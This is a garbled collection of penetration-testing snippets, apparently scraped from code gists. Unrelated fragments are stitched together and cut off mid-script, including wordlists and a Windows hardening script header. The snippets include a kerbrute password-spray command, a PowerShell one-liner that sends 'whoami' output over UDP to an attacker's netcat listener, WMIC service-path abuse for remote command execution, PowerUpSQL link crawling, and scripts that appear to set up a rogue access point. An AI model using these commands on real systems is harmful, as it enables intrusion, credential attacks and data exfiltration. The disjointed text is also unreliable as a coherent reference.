With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
rss.php | |
coupon_activation.php | |
tools/bizproc_wf_settings.php | |
tools/seo_yandex.php | |
tools/seo_google.php | |
tools/get_catalog_menu.php | |
tools/sale_farm_check_print.php | |
tools/vote/uf.php | |
tools/vote/vote_chart.php | |
tools/sale/discount_coupon_list.php |
:: Windows 10 Hardening Script | |
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering. | |
:: Obligatory 'views are my own'. :) | |
:: Thank you @jaredhaight for the Win Firewall config recommendations! | |
:: Thank you @ricardojba for the DLL Safe Order Search reg key! | |
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings! | |
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater | |
: |
/ | |
$$$lang-translate.service.js.aspx | |
$367-Million-Merger-Blocked.html | |
$defaultnav | |
${idfwbonavigation}.xml | |
$_news.php | |
$search2 | |
£º | |
.0 | |
/0 |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# On your host: | |
# $ nc -lnvup 53 | |
# Replace <HOSTIP> with ip of the listening machine | |
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));" | |
####################### | |
### Proxy curl/wget ### | |
####################### | |
export http_proxy=localhost:8080 | |
export https_proxy=localhost:8080 | |
curl -k https://ifconfig.io | |
wget --no-check-certificates https://ifconfig.io | |
####################### | |
### Proxy Java JARs ### |
# https://github.com/NetSPI/PowerUpSQL | |
# Get-SQLServerLinkCrawl -verbose -instance "[ip-address]\SQLSERVER2008" -username 'guest' -password 'guest' | export-clixml c:\temp\links.xml | |
$List = Import-CliXml 'C:\temp\links.xml' | |
$Servers = $List | select name,version,path,user,sysadmin -unique | where name -ne 'broken link' | |
$Outnodes = @() | |
$Outpaths = @() | |
foreach($Server in $Servers){ | |
$Outnodes += "$([string][math]::abs($Server.Name.GetHashCode())),$($Server.Name),$($Server.Version)" |
As always, only for use on networks you own or have permission to test against. | |
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
#!/bin/bash | |
IF_IN="eth0" | |
IF_OUT="wlan0" | |
SUB="192.168.100" | |
echo "[+] Bringing interface ${IF_IN} down" | |
ip addr del ${SUB}.1/24 dev ${IF_IN} | |
ip link set dev ${IF_IN} down | |
echo "[+] Removing iptable rules" |
#!/bin/bash | |
IF_IN="eth0" | |
IF_OUT="wlan0" | |
SUB="192.168.100" | |
echo "[+] Creating DHCP server config." | |
cat <<EOF > /etc/dhcp/dhcp.${IF_IN}.conf | |
option routers ${SUB}.1; | |
option domain-name-servers ${SUB}.1; | |
default-lease-time 14440; |